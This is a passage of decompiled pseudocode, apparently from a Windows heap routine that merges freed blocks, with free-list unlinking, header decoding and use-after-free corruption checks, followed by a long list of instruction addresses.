						while((( *(_t717 + 0x4c) >> 0x00000014 &  *(_t717 + 0x52) ^ _t720[0]) & 0x00000001) == 0) {
							if( *(_t717 + 0x4c) != 0) {
								 *_t720 =  *_t720 ^  *(_t717 + 0x50);
								if(_t720[0] != (_t720[0] ^  *_t720 ^ _t720[0])) {
									_push(0);
									_push(_t720);
									_push(_t717);
									E0099F8EE(_t520, _t717, _t720, __eflags);
								}
							}
							if(_a16 != 0) {
								_t644 =  *((intOrPtr*)(_t520 + 0xc));
								_t389 = _t520 + 8;
								_t533 =  *_t389;
								_v20 = _t533;
								_t534 =  *((intOrPtr*)(_t533 + 4));
								_v16 = _t644;
								_t645 =  *_t644;
								__eflags = _t645 - _t534;
								if(__eflags != 0) {
									L179:
									_push(0);
									_push(_t645);
									_push(_t534);
									_push(_t389);
									_push(_t717);
									_push(0xc);
									E0099F840(_t520, _t534, _t645, _t717, _t720, __eflags);
									L189:
									_a16 = 0;
									goto L8;
								}
								__eflags = _t645 - _t389;
								if(__eflags != 0) {
									goto L179;
								}
								 *(_t717 + 0x78) =  *(_t717 + 0x78) - ( *_t520 & 0x0000ffff);
								_t421 =  *(_t717 + 0xb8);
								__eflags = _t421;
								if(_t421 == 0) {
									L172:
									_t422 = _v20;
									_t565 = _v16;
									 *_t565 = _t422;
									 *((intOrPtr*)(_t422 + 4)) = _t565;
									__eflags =  *(_t520 + 2) & 0x00000008;
									if(__eflags == 0) {
										L180:
										_t423 =  *(_t520 + 2);
										__eflags = _t423 & 0x00000004;
										if(__eflags != 0) {
											_t567 = ( *_t520 & 0x0000ffff) * 8 - 0x10;
											_a16 = _t567;
											__eflags = _t423 & 0x00000002;
											if((_t423 & 0x00000002) != 0) {
												__eflags = _t567 - 4;
												if(_t567 > 4) {
													_t343 =  &_a16;
													 *_t343 = _a16 - 4;
													__eflags =  *_t343;
												}
											}
											_t425 = E00928950(_t520 + 0x10, _a16, 0xfeeefeee);
											_a4 = _t425;
											__eflags = _t425 - _a16;
											if(__eflags != 0) {
												_t427 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
												__eflags =  *(_t427 + 0xc);
												if( *(_t427 + 0xc) == 0) {
													_push("HEAP: ");
													E0094373B();
												} else {
													E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
												}
												_push(_a4 + _t520 + 0x10);
												E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t520);
												_t727 = _t727 + 0xc;
												E009A06F9(_t520);
											}
										}
										goto L189;
									}
									_t439 = E009261FE(_t520, __eflags);
									__eflags = _t439;
									if(_t439 != 0) {
										goto L180;
									}
									E0091EE4C(_t520, _t717, _t717, _t520,  *_t520 & 0x0000ffff, 1);
									goto L189;
								}
								_t571 =  *_t520 & 0x0000ffff;
								while(1) {
									__eflags = _t571 -  *(_t421 + 4);
									if(_t571 <  *(_t421 + 4)) {
										break;
									}
									_t663 =  *_t421;
									__eflags = _t663;
									if(_t663 == 0) {
										_t724 =  *(_t421 + 4) - 1;
										__eflags = _t724;
										_a16 = _t724;
										L155:
										_t573 = _t724 -  *((intOrPtr*)(_t421 + 0x14));
										__eflags =  *(_t421 + 8);
										_v12 = _t573;
										if( *(_t421 + 8) != 0) {
											_t573 = _t573 + _t573;
											__eflags = _t573;
										}
										_t665 = _t573 << 2;
										_a4 = _t665;
										_t666 = _t665 +  *((intOrPtr*)(_t421 + 0x20));
										 *((intOrPtr*)(_t421 + 0xc)) =  *((intOrPtr*)(_t421 + 0xc)) - 1;
										_v24 =  *_t666;
										__eflags = _t724 -  *(_t421 + 4) - 1;
										if(_t724 ==  *(_t421 + 4) - 1) {
											_t296 = _t421 + 0x10;
											 *_t296 =  *(_t421 + 0x10) - 1;
											__eflags =  *_t296;
										}
										__eflags = _v24 - _t520 + 8;
										if(_v24 != _t520 + 8) {
											L171:
											_t720 = _a8;
											goto L172;
										} else {
											__eflags =  *_t421;
											_t579 =  *(_t421 + 4);
											if( *_t421 == 0) {
												_t579 = _t579 - 1;
												__eflags = _t579;
											}
											__eflags = _a16 - _t579;
											_t580 =  *(_t520 + 8);
											if(_a16 >= _t579) {
												_t720 = _a8;
												__eflags = _t580 -  *((intOrPtr*)(_t421 + 0x18));
												if(_t580 ==  *((intOrPtr*)(_t421 + 0x18))) {
													 *_t666 =  *_t666 & 0x00000000;
													 *( *((intOrPtr*)(_t421 + 0x1c)) + (_v12 >> 5) * 4) =  *( *((intOrPtr*)(_t421 + 0x1c)) + (_v12 >> 5) * 4) &  !(1 << (_v12 & 0x0000001f));
												} else {
													 *_t666 = _t580;
												}
												goto L172;
											} else {
												__eflags = _t580 -  *((intOrPtr*)(_t421 + 0x18));
												if(_t580 ==  *((intOrPtr*)(_t421 + 0x18))) {
													L175:
													 *(_a4 +  *((intOrPtr*)(_t421 + 0x20))) =  *(_a4 +  *((intOrPtr*)(_t421 + 0x20))) & 0x00000000;
													 *( *((intOrPtr*)(_t421 + 0x1c)) + (_v12 >> 5) * 4) =  *( *((intOrPtr*)(_t421 + 0x1c)) + (_v12 >> 5) * 4) &  !(1 << (_v12 & 0x0000001f));
													goto L171;
												}
												__eflags =  *(_t717 + 0x4c);
												if( *(_t717 + 0x4c) == 0) {
													_t680 =  *(_t580 - 8) & 0x0000ffff;
												} else {
													_t683 =  *(_t580 - 8);
													__eflags =  *(_t717 + 0x4c) & _t683;
													if(( *(_t717 + 0x4c) & _t683) != 0) {
														_t683 = _t683 ^  *(_t717 + 0x50);
														__eflags = _t683;
													}
													_t680 = _t683 & 0x0000ffff;
												}
												__eflags = ( *_t520 & 0x0000ffff) != (_t680 & 0x0000ffff);
												if(( *_t520 & 0x0000ffff) != (_t680 & 0x0000ffff)) {
													goto L175;
												} else {
													 *(_a4 +  *((intOrPtr*)(_t421 + 0x20))) = _t580;
													goto L171;
												}
											}
										}
									}
									_t421 = _t663;
								}
								_t724 = _t571;
								_a16 = _t571;
								goto L155;
							}
							L8:
							_t646 = _t720[3];
							_t391 =  &(_t720[2]);
							_t535 =  *_t391;
							_v20 = _t535;
							_t536 =  *(_t535 + 4);
							_v16 = _t646;
							_t643 =  *_t646;
							if(_t643 != _t536 || _t643 != _t391) {
								_push(0);
								_push(_t643);
								_push(_t536);
								_push(_t391);
								_push(_t717);
								_push(0xc);
								L191:
								E0099F840(_t520, _t536, _t643, _t717, _t720, __eflags);
								continue;
							} else {
								 *(_t717 + 0x78) =  *(_t717 + 0x78) - ( *_t720 & 0x0000ffff);
								_t394 =  *(_t717 + 0xb8);
								if(_t394 == 0) {
									L28:
									_t395 = _v20;
									_t537 = _v16;
									 *_t537 = _t395;
									 *((intOrPtr*)(_t395 + 4)) = _t537;
									if((_t720[0] & 0x00000008) != 0) {
										_t396 = E009261FE(_t720, __eflags);
										__eflags = _t396;
										if(_t396 != 0) {
											goto L29;
										}
										E0091EE4C(_t520, _t717, _t717, _t720,  *_t720 & 0x0000ffff, 1);
										continue;
									}
									L29:
									_t397 = _t720[0];
									if((_t397 & 0x00000004) != 0) {
										_t540 = ( *_t720 & 0x0000ffff) * 8 - 0x10;
										_a16 = _t540;
										__eflags = _t397 & 0x00000002;
										if((_t397 & 0x00000002) != 0) {
											__eflags = _t540 - 4;
											if(_t540 > 4) {
												_t363 =  &_a16;
												 *_t363 = _a16 - 4;
												__eflags =  *_t363;
											}
										}
										_t399 = E00928950( &(_t720[4]), _a16, 0xfeeefeee);
										_a8 = _t399;
										__eflags = _t399 - _a16;
										if(_t399 != _a16) {
											_t403 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
											__eflags =  *(_t403 + 0xc);
											if( *(_t403 + 0xc) == 0) {
												_push("HEAP: ");
												E0094373B();
											} else {
												E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
											}
											_push( &(_t720[4]) + _a8);
											E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t720);
											E009A06F9(_t720);
										}
									}
									_t400 = _a12;
									 *(_t520 + 2) = 0;
									 *((char*)(_t520 + 7)) = 0;
									 *_t400 =  *_t400 + ( *_t720 & 0x0000ffff);
									 *_t520 =  *_t400;
									 *(_t520 + 4 +  *_t400 * 8) =  *_t400 ^  *(_t717 + 0x54);
									break;
								} else {
									_t547 =  *_t720 & 0x0000ffff;
									L12:
									L12:
									if(_t547 >=  *((intOrPtr*)(_t394 + 4))) {
										goto L36;
									} else {
										_t722 = _t547;
										_a4 = _t547;
									}
									L14:
									_t549 = _t722 -  *((intOrPtr*)(_t394 + 0x14));
									_v8 = _t549;
									if( *((intOrPtr*)(_t394 + 8)) != 0) {
										_t549 = _t549 + _t549;
									}
									_t650 = _t549 << 2;
									_v12 = _t650;
									_t651 = _t650 +  *((intOrPtr*)(_t394 + 0x20));
									 *((intOrPtr*)(_t394 + 0xc)) =  *((intOrPtr*)(_t394 + 0xc)) - 1;
									_v24 =  *_t651;
									if(_t722 ==  *((intOrPtr*)(_t394 + 4)) - 1) {
										 *((intOrPtr*)(_t394 + 0x10)) =  *((intOrPtr*)(_t394 + 0x10)) - 1;
									}
									if(_v24 != _a8 + 8) {
										_t720 = _a8;
										goto L28;
									} else {
										_t556 =  *((intOrPtr*)(_t394 + 4));
										if( *_t394 == 0) {
											_t556 = _t556 - 1;
										}
										_t720 = _a8;
										_t557 = _t720[2];
										if(_a4 >= _t556) {
											__eflags = _t557 -  *((intOrPtr*)(_t394 + 0x18));
											if(__eflags == 0) {
												 *_t651 =  *_t651 & 0x00000000;
												L27:
												 *( *((intOrPtr*)(_t394 + 0x1c)) + (_v8 >> 5) * 4) =  *( *((intOrPtr*)(_t394 + 0x1c)) + (_v8 >> 5) * 4) &  !(1 << (_v8 & 0x0000001f));
												goto L28;
											}
											 *_t651 = _t557;
											goto L28;
										}
										_a4 = _t557;
										if(_t557 ==  *((intOrPtr*)(_t394 + 0x18))) {
											L26:
											 *(_v12 +  *((intOrPtr*)(_t394 + 0x20))) =  *(_v12 +  *((intOrPtr*)(_t394 + 0x20))) & 0x00000000;
											goto L27;
										}
										if( *(_t717 + 0x4c) == 0) {
											_t561 =  *(_t557 - 8) & 0x0000ffff;
										} else {
											_t564 =  *(_t557 - 8);
											if(( *(_t717 + 0x4c) & _t564) != 0) {
												_t564 = _t564 ^  *(_t717 + 0x50);
											}
											_t561 = _t564 & 0x0000ffff;
										}
										if(( *_t720 & 0x0000ffff) == (_t561 & 0x0000ffff)) {
											 *(_v12 +  *((intOrPtr*)(_t394 + 0x20))) = _a4;
											goto L28;
										} else {
											goto L26;
										}
									}
									L36:
									_t648 =  *_t394;
									__eflags = _t648;
									if(__eflags == 0) {
										_t722 =  *((intOrPtr*)(_t394 + 4)) - 1;
										_a4 = _t722;
										goto L14;
									} else {
										_t394 = _t648;
										goto L12;
									}
								}
							}
						}
						if(( *(_t717 + 0x44) & 0x01000000) == 0) {
							_t388 =  *((intOrPtr*)(_t717 + 0xe0)) - ( *(_t717 + 0x78) << 3);
							_t92 = _t717 + 0x128; // 0x128
							_t532 = _t92;
							if(_t388 >  *_t532) {
								 *_t532 = _t388;
							}
							 *((intOrPtr*)(_t717 + 0x12c)) = _t388;
						}
						return _t520;
					}
					_t452 =  *_t720;
					_v32 = _t452;
					_t453 = _t452 ^  *(_t717 + 0x50);
					_v32 = _t453;
					_t536 = _t453 ^ _t453 ^ _v30;
					if(_t453 >> 0x18 != (_t453 ^ _t453 ^ _v30)) {
						_push(0);
						_push(0);
						_push(0);
						_push(_t720);
						_push(_t717);
						_push(3);
						goto L191;
					}
					goto L4;
				}
				_t456 =  *(_t717 + 0x4c);
				if(((_t456 >> 0x00000014 &  *(_t717 + 0x52) ^  *(_t719 + 2)) & 0x00000001) == 0) {
					__eflags = _t456;
					if(_t456 != 0) {
						 *_t719 =  *_t719 ^  *(_t717 + 0x50);
						__eflags =  *((intOrPtr*)(_t719 + 3)) - ( *(_t719 + 1) ^  *_t719 ^  *(_t719 + 2));
						if(__eflags != 0) {
							_push(0);
							_push(_t719);
							_push(_t717);
							E0099F8EE(_t520, _t717, _t719, __eflags);
						}
					}
					__eflags = _a16;
					if(_a16 != 0) {
						_t684 =  *((intOrPtr*)(_t520 + 0xc));
						_t457 = _t520 + 8;
						_t592 =  *_t457;
						_v16 = _t592;
						_t593 =  *((intOrPtr*)(_t592 + 4));
						_v20 = _t684;
						_t685 =  *_t684;
						__eflags = _t685 - _t593;
						if(__eflags != 0) {
							L123:
							_push(0);
							_push(_t685);
							_push(_t593);
							_push(_t457);
							_push(_t717);
							_push(0xc);
							E0099F840(_t520, _t593, _t685, _t717, _t719, __eflags);
							L133:
							_a16 = 0;
							goto L41;
						}
						__eflags = _t685 - _t457;
						if(__eflags != 0) {
							goto L123;
						}
						 *(_t717 + 0x78) =  *(_t717 + 0x78) - ( *_t520 & 0x0000ffff);
						_t491 =  *(_t717 + 0xb8);
						__eflags = _t491;
						if(_t491 == 0) {
							L120:
							_t492 = _v16;
							_t619 = _v20;
							 *_t619 = _t492;
							 *((intOrPtr*)(_t492 + 4)) = _t619;
							__eflags =  *(_t520 + 2) & 0x00000008;
							if(__eflags == 0) {
								L124:
								_t493 =  *(_t520 + 2);
								__eflags = _t493 & 0x00000004;
								if((_t493 & 0x00000004) != 0) {
									_t621 = ( *_t520 & 0x0000ffff) * 8 - 0x10;
									_a16 = _t621;
									__eflags = _t493 & 0x00000002;
									if((_t493 & 0x00000002) != 0) {
										__eflags = _t621 - 4;
										if(_t621 > 4) {
											_t246 =  &_a16;
											 *_t246 = _a16 - 4;
											__eflags =  *_t246;
										}
									}
									_t495 = E00928950(_t520 + 0x10, _a16, 0xfeeefeee);
									_a4 = _t495;
									__eflags = _t495 - _a16;
									if(_t495 != _a16) {
										_t497 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
										__eflags =  *(_t497 + 0xc);
										if( *(_t497 + 0xc) == 0) {
											_push("HEAP: ");
											E0094373B();
										} else {
											E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_a4 + _t520 + 0x10);
										E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t520);
										_t727 = _t727 + 0xc;
										E009A06F9(_t520);
									}
								}
								goto L133;
							}
							_t509 = E009261FE(_t520, __eflags);
							__eflags = _t509;
							if(_t509 != 0) {
								goto L124;
							}
							E0091EE4C(_t520, _t717, _t717, _t520,  *_t520 & 0x0000ffff, 1);
							goto L133;
						}
						_t625 =  *_t520 & 0x0000ffff;
						while(1) {
							__eflags = _t625 -  *(_t491 + 4);
							if(_t625 <  *(_t491 + 4)) {
								break;
							}
							_t704 =  *_t491;
							__eflags = _t704;
							if(_t704 == 0) {
								_t528 =  *(_t491 + 4) - 1;
								__eflags = _t528;
								_a16 = _t528;
								L98:
								_t627 = _t528 -  *((intOrPtr*)(_t491 + 0x14));
								__eflags =  *(_t491 + 8);
								_v8 = _t627;
								if( *(_t491 + 8) != 0) {
									_t627 = _t627 + _t627;
									__eflags = _t627;
								}
								_t628 = _t627 << 2;
								_t706 =  *((intOrPtr*)(_t491 + 0x20)) + _t628;
								_a4 = _t628;
								 *((intOrPtr*)(_t491 + 0xc)) =  *((intOrPtr*)(_t491 + 0xc)) - 1;
								_v12 =  *_t706;
								__eflags = _t528 -  *(_t491 + 4) - 1;
								if(_t528 ==  *(_t491 + 4) - 1) {
									_t201 = _t491 + 0x10;
									 *_t201 =  *(_t491 + 0x10) - 1;
									__eflags =  *_t201;
								}
								__eflags = _v12 - _a8 + 8;
								if(_v12 != _a8 + 8) {
									_t520 = _a8;
									goto L120;
								} else {
									__eflags =  *_t491;
									_t634 =  *(_t491 + 4);
									if( *_t491 == 0) {
										_t634 = _t634 - 1;
										__eflags = _t634;
									}
									_t520 = _a8;
									__eflags = _a16 - _t634;
									_t635 =  *(_t520 + 8);
									if(_a16 >= _t634) {
										__eflags = _t635 -  *((intOrPtr*)(_t491 + 0x18));
										if(_t635 ==  *((intOrPtr*)(_t491 + 0x18))) {
											 *_t706 =  *_t706 & 0x00000000;
											goto L115;
										}
										 *_t706 = _t635;
										goto L120;
									} else {
										_a16 = _t635;
										__eflags = _t635 -  *((intOrPtr*)(_t491 + 0x18));
										if(_t635 ==  *((intOrPtr*)(_t491 + 0x18))) {
											L114:
											_t638 =  *((intOrPtr*)(_t491 + 0x20));
											_t713 = _a4;
											_t224 = _t713 + _t638;
											 *_t224 =  *(_t713 + _t638) & 0x00000000;
											__eflags =  *_t224;
											L115:
											 *( *((intOrPtr*)(_t491 + 0x1c)) + (_v8 >> 5) * 4) =  *( *((intOrPtr*)(_t491 + 0x1c)) + (_v8 >> 5) * 4) &  !(1 << (_v8 & 0x0000001f));
											goto L120;
										}
										__eflags =  *(_t717 + 0x4c);
										if( *(_t717 + 0x4c) == 0) {
											_t639 =  *(_t635 - 8) & 0x0000ffff;
										} else {
											_t642 =  *(_t635 - 8);
											__eflags =  *(_t717 + 0x4c) & _t642;
											if(( *(_t717 + 0x4c) & _t642) != 0) {
												_t642 = _t642 ^  *(_t717 + 0x50);
												__eflags = _t642;
											}
											_t639 = _t642 & 0x0000ffff;
										}
										__eflags = ( *_t520 & 0x0000ffff) != (_t639 & 0x0000ffff);
										if(( *_t520 & 0x0000ffff) != (_t639 & 0x0000ffff)) {
											goto L114;
										} else {
											 *((intOrPtr*)(_a4 +  *((intOrPtr*)(_t491 + 0x20)))) = _a16;
											goto L120;
										}
									}
								}
							}
							_t491 = _t704;
						}
						_t528 = _t625;
						_a16 = _t625;
						goto L98;
					}
					L41:
					_t686 =  *(_t719 + 0xc);
					_t459 = _t719 + 8;
					_t594 =  *_t459;
					_v16 = _t594;
					_t595 =  *((intOrPtr*)(_t594 + 4));
					_v24 = _t686;
					_t643 =  *_t686;
					__eflags = _t643 - _t595;
					if(__eflags != 0) {
						L135:
						_push(0);
						_push(_t643);
						_push(_t595);
						_push(_t459);
						_push(_t717);
						_push(0xc);
						E0099F840(_t520, _t595, _t643, _t717, _t719, __eflags);
						goto L2;
					}
					__eflags = _t643 - _t459;
					if(__eflags != 0) {
						goto L135;
					}
					 *(_t717 + 0x78) =  *(_t717 + 0x78) - ( *_t719 & 0x0000ffff);
					_t462 =  *(_t717 + 0xb8);
					__eflags = _t462;
					if(_t462 == 0) {
						L62:
						_t463 = _v16;
						_t596 = _v24;
						 *_t596 = _t463;
						_t463[1] = _t596;
						__eflags =  *(_t719 + 2) & 0x00000008;
						if(__eflags != 0) {
							_t643 = _t719;
							_t464 = E009261FE(_t719, __eflags);
							__eflags = _t464;
							if(_t464 != 0) {
								goto L63;
							}
							E0091EE4C(_t520, _t717, _t717, _t719,  *_t719 & 0x0000ffff, 1);
							goto L2;
						}
						L63:
						_t465 =  *(_t719 + 2);
						__eflags = _t465 & 0x00000004;
						if(__eflags != 0) {
							_t522 = ( *_t719 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t465 & 0x00000002;
							if((_t465 & 0x00000002) != 0) {
								__eflags = _t522 - 4;
								if(_t522 > 4) {
									_t522 = _t522 - 4;
									__eflags = _t522;
								}
							}
							_t467 = E00928950(_t719 + 0x10, _t522, 0xfeeefeee);
							_a8 = _t467;
							__eflags = _t467 - _t522;
							if(__eflags != 0) {
								_t471 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t471 + 0xc);
								if( *(_t471 + 0xc) == 0) {
									_push("HEAP: ");
									E0094373B();
								} else {
									E0094373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_a8 + _t719 + 0x10);
								E0094373B("HEAP: Free Heap block %lx modified at %lx after it was freed\n", _t719);
								_t727 = _t727 + 0xc;
								E009A06F9(_t719);
							}
						}
						_t468 = _a12;
						 *(_t719 + 2) = 0;
						 *((char*)(_t719 + 7)) = 0;
						 *_t468 =  *_t468 + ( *_t719 & 0x0000ffff);
						 *_t719 =  *_t468;
						_t520 = _t719;
						 *(_t719 + 4 +  *_t468 * 8) =  *_t468 ^  *(_t717 + 0x54);
						goto L2;
					} else {
						_t604 =  *_t719 & 0x0000ffff;
						while(1) {
							__eflags = _t604 -  *(_t462 + 4);
							if(_t604 <  *(_t462 + 4)) {
								break;
							}
							_t687 =  *_t462;
							__eflags = _t687;
							if(_t687 == 0) {
								_t524 =  *(_t462 + 4) - 1;
								_a4 = _t524;
								L47:
								_t606 = _t524 -  *((intOrPtr*)(_t462 + 0x14));
								__eflags =  *(_t462 + 8);
								_v12 = _t606;
								if( *(_t462 + 8) != 0) {
									_t606 = _t606 + _t606;
									__eflags = _t606;
								}
								_t607 = _t606 << 2;
								_t643 =  *((intOrPtr*)(_t462 + 0x20)) + _t607;
								_v8 = _t607;
								 *((intOrPtr*)(_t462 + 0xc)) =  *((intOrPtr*)(_t462 + 0xc)) - 1;
								_v20 =  *_t643;
								__eflags = _t524 -  *(_t462 + 4) - 1;
								if(_t524 ==  *(_t462 + 4) - 1) {
									 *((intOrPtr*)(_t462 + 0x10)) =  *((intOrPtr*)(_t462 + 0x10)) - 1;
								}
								__eflags = _v20 - _t719 + 8;
								if(_v20 != _t719 + 8) {
									L61:
									_t520 = _a8;
									goto L62;
								} else {
									__eflags =  *_t462;
									_t612 =  *(_t462 + 4);
									if( *_t462 == 0) {
										_t612 = _t612 - 1;
										__eflags = _t612;
									}
									__eflags = _a4 - _t612;
									_t613 =  *(_t719 + 8);
									if(_a4 >= _t612) {
										_t520 = _a8;
										__eflags = _t613 -  *((intOrPtr*)(_t462 + 0x18));
										if(_t613 ==  *((intOrPtr*)(_t462 + 0x18))) {
											 *_t643 =  *_t643 & 0x00000000;
											_t614 = _v12;
											_t643 =  !(1 << (_t614 & 0x0000001f));
											 *( *((intOrPtr*)(_t462 + 0x1c)) + (_t614 >> 5) * 4) =  *( *((intOrPtr*)(_t462 + 0x1c)) + (_t614 >> 5) * 4) & 1;
										} else {
											 *_t643 = _t613;
										}
										goto L62;
									} else {
										__eflags = _t613 -  *((intOrPtr*)(_t462 + 0x18));
										if(_t613 ==  *((intOrPtr*)(_t462 + 0x18))) {
											L60:
											 *(_v8 +  *((intOrPtr*)(_t462 + 0x20))) =  *(_v8 +  *((intOrPtr*)(_t462 + 0x20))) & 0x00000000;
											_t617 = _v12;
											_t488 =  *((intOrPtr*)(_t462 + 0x1c)) + (_t617 >> 5) * 4;
											_t643 =  !(1 << (_t617 & 0x0000001f));
											 *_t488 =  *_t488 & 1;
											__eflags =  *_t488;
											goto L61;
										}
										__eflags =  *(_t717 + 0x4c);
										if( *(_t717 + 0x4c) == 0) {
											_t700 =  *(_t613 - 8) & 0x0000ffff;
										} else {
											_t702 =  *(_t613 - 8);
											__eflags =  *(_t717 + 0x4c) & _t702;
											if(( *(_t717 + 0x4c) & _t702) != 0) {
												_t702 = _t702 ^  *(_t717 + 0x50);
												__eflags = _t702;
											}
											_t700 = _t702 & 0x0000ffff;
										}
										__eflags = ( *_t719 & 0x0000ffff) == (_t700 & 0x0000ffff);
										if(( *_t719 & 0x0000ffff) == (_t700 & 0x0000ffff)) {
											_t643 = _v8;
											 *(_v8 +  *((intOrPtr*)(_t462 + 0x20))) = _t613;
											goto L61;
										} else {
											goto L60;
										}
									}
								}
							}
							_t462 = _t687;
						}
						_t524 = _t604;
						_a4 = _t604;
						goto L47;
					}
				}
				goto L2;
			}























































































































                                                0x009029bb
                                                0x009029c4
                                                0x009029d2
                                                0x009029d6
                                                0x009029ef
                                                0x009029f8
                                                0x009029fb
                                                0x009029fe
                                                0x00000000
                                                0x00902a1d
                                                0x00902a35
                                                0x00902a3a
                                                0x00902a47
                                                0x0095a05f
                                                0x0095a061
                                                0x0095a062
                                                0x0095a063
                                                0x0095a063
                                                0x00902a47
                                                0x00902a51
                                                0x0095a06d
                                                0x0095a070
                                                0x0095a073
                                                0x0095a075
                                                0x0095a078
                                                0x0095a07b
                                                0x0095a07e
                                                0x0095a080
                                                0x0095a082
                                                0x0095a1ce
                                                0x0095a1ce
                                                0x0095a1d0
                                                0x0095a1d1
                                                0x0095a1d2
                                                0x0095a1d3
                                                0x0095a1d4
                                                0x0095a1d6
                                                0x0095a274
                                                0x0095a274
                                                0x00000000
                                                0x0095a274
                                                0x0095a088
                                                0x0095a08a
                                                0x00000000
                                                0x00000000
                                                0x0095a093
                                                0x0095a096
                                                0x0095a09c
                                                0x0095a09e
                                                0x0095a146
                                                0x0095a146
                                                0x0095a149
                                                0x0095a14c
                                                0x0095a14e
                                                0x0095a151
                                                0x0095a155
                                                0x0095a1e0
                                                0x0095a1e0
                                                0x0095a1e3
                                                0x0095a1e5
                                                0x0095a1ee
                                                0x0095a1f5
                                                0x0095a1f8
                                                0x0095a1fa
                                                0x0095a1fc
                                                0x0095a1ff
                                                0x0095a201
                                                0x0095a201
                                                0x0095a201
                                                0x0095a201
                                                0x0095a1ff
                                                0x0095a211
                                                0x0095a216
                                                0x0095a219
                                                0x0095a21c
                                                0x0095a224
                                                0x0095a227
                                                0x0095a22b
                                                0x0095a24d
                                                0x0095a252
                                                0x0095a22d
                                                0x0095a245
                                                0x0095a24a
                                                0x0095a25f
                                                0x0095a266
                                                0x0095a26b
                                                0x0095a26f
                                                0x0095a26f
                                                0x0095a21c
                                                0x00000000
                                                0x0095a1e5
                                                0x0095a15f
                                                0x0095a164
                                                0x0095a166
                                                0x00000000
                                                0x00000000
                                                0x0095a170
                                                0x00000000
                                                0x0095a170
                                                0x0095a0a4
                                                0x0095a0b1
                                                0x0095a0b1
                                                0x0095a0b4
                                                0x00000000
                                                0x00000000
                                                0x0095a0a9
                                                0x0095a0ab
                                                0x0095a0ad
                                                0x0095a0c0
                                                0x0095a0c0
                                                0x0095a0c1
                                                0x0095a0c4
                                                0x0095a0c6
                                                0x0095a0c9
                                                0x0095a0cd
                                                0x0095a0d0
                                                0x0095a0d2
                                                0x0095a0d2
                                                0x0095a0d2
                                                0x0095a0d9
                                                0x0095a0dc
                                                0x0095a0df
                                                0x0095a0e3
                                                0x0095a0e6
                                                0x0095a0ed
                                                0x0095a0ef
                                                0x0095a0f1
                                                0x0095a0f1
                                                0x0095a0f1
                                                0x0095a0f1
                                                0x0095a0f7
                                                0x0095a0fa
                                                0x0095a143
                                                0x0095a143
                                                0x00000000
                                                0x0095a0fc
                                                0x0095a0fc
                                                0x0095a0ff
                                                0x0095a102
                                                0x0095a104
                                                0x0095a104
                                                0x0095a104
                                                0x0095a105
                                                0x0095a108
                                                0x0095a10b
                                                0x0095a1a0
                                                0x0095a1a3
                                                0x0095a1a6
                                                0x0095a1ac
                                                0x0095a1c7
                                                0x0095a1a8
                                                0x0095a1a8
                                                0x0095a1a8
                                                0x00000000
                                                0x0095a111
                                                0x0095a111
                                                0x0095a114
                                                0x0095a17a
                                                0x0095a180
                                                0x0095a19c
                                                0x00000000
                                                0x0095a19c
                                                0x0095a116
                                                0x0095a11a
                                                0x0095a12c
                                                0x0095a11c
                                                0x0095a11c
                                                0x0095a11f
                                                0x0095a122
                                                0x0095a124
                                                0x0095a124
                                                0x0095a124
                                                0x0095a127
                                                0x0095a127
                                                0x0095a136
                                                0x0095a138
                                                0x00000000
                                                0x0095a13a
                                                0x0095a140
                                                0x00000000
                                                0x0095a140
                                                0x0095a138
                                                0x0095a10b
                                                0x0095a0fa
                                                0x0095a0af
                                                0x0095a0af
                                                0x0095a0b6
                                                0x0095a0b8
                                                0x00000000
                                                0x0095a0b8
                                                0x00902a57
                                                0x00902a57
                                                0x00902a5a
                                                0x00902a5d
                                                0x00902a5f
                                                0x00902a62
                                                0x00902a65
                                                0x00902a68
                                                0x00902a6c
                                                0x00908501
                                                0x00908503
                                                0x00908504
                                                0x00908505
                                                0x00908506
                                                0x00908507
                                                0x0095a28f
                                                0x0095a28f
                                                0x00000000
                                                0x00902a7a
                                                0x00902a7d
                                                0x00902a80
                                                0x00902a88
                                                0x00902b4c
                                                0x00902b4c
                                                0x00902b4f
                                                0x00902b52
                                                0x00902b54
                                                0x00902b5b
                                                0x00926298
                                                0x0092629d
                                                0x0092629f
                                                0x00000000
                                                0x00000000
                                                0x0095a285
                                                0x00000000
                                                0x0095a285
                                                0x00902b61
                                                0x00902b61
                                                0x00902b66
                                                0x0095a29c
                                                0x0095a2a3
                                                0x0095a2a6
                                                0x0095a2a8
                                                0x0095a2aa
                                                0x0095a2ad
                                                0x0095a2af
                                                0x0095a2af
                                                0x0095a2af
                                                0x0095a2af
                                                0x0095a2ad
                                                0x0095a2bf
                                                0x0095a2c4
                                                0x0095a2c7
                                                0x0095a2ca
                                                0x0095a2d6
                                                0x0095a2d9
                                                0x0095a2dd
                                                0x0095a2ff
                                                0x0095a304
                                                0x0095a2df
                                                0x0095a2f7
                                                0x0095a2fc
                                                0x0095a311
                                                0x0095a318
                                                0x0095a321
                                                0x0095a321
                                                0x0095a2ca
                                                0x00902b6c
                                                0x00902b6f
                                                0x00902b73
                                                0x00902b7a
                                                0x00902b7f
                                                0x00902b8b
                                                0x00000000
                                                0x00902a8e
                                                0x00902a8e
                                                0x00000000
                                                0x00902a91
                                                0x00902a94
                                                0x00000000
                                                0x00902a9a
                                                0x00902a9a
                                                0x00902a9c
                                                0x00902a9c
                                                0x00902a9f
                                                0x00902aa1
                                                0x00902aa8
                                                0x00902aab
                                                0x00902aad
                                                0x00902aad
                                                0x00902ab4
                                                0x00902ab7
                                                0x00902aba
                                                0x00902abe
